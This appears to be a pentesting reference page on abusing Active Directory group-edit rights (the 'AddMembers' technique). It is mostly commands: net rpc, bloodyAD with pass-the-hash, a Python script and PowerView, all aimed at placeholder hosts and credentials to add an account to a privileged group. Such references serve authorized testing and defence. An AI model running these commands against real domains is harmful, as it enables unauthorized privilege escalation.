AddMembers
When an attacker controls a privileged user account with the ability to edit a group's member attribute, they can effectively add new users to that group - this attack is possible when the controlled account has GenericAll
, GenericWrite
, Self
, AllExtendedRights
, or Self-Membership
over the target group.
Once we found the right user or group with one of these ACLs we can exploit it with the following commands
net rpc group addmem 'Vulnerable Group' otter -U domain.com/otter%'SomethingSecure123!' -S 10.10.10.10
# verify the changes took place
net rpc group members 'Vulnerable Group' -U domain.com/otter%SomethingSecure123! -S 10.10.10.10
If we only have the hash for the user we can either use the pth-toolkit or bloodyAD
bloodyAD --host "10.10.10.10" -d "domain.com" -u "otter" -p "ffffffffffffffffffffffffffffffff:<NTLM_HASH>" add groupMember groupName 'userToAdd'
We can also use the addusertogroup script
python3 addusertogroup.py -d domain.com -g "Vulnerable Group" -a otter -u otter -p 'SomethingSecure123!'
From windows we can use powerview
Add-DomainGroupMember -Identity "Vulnerable Group" -Members otter -Verbose
Last updated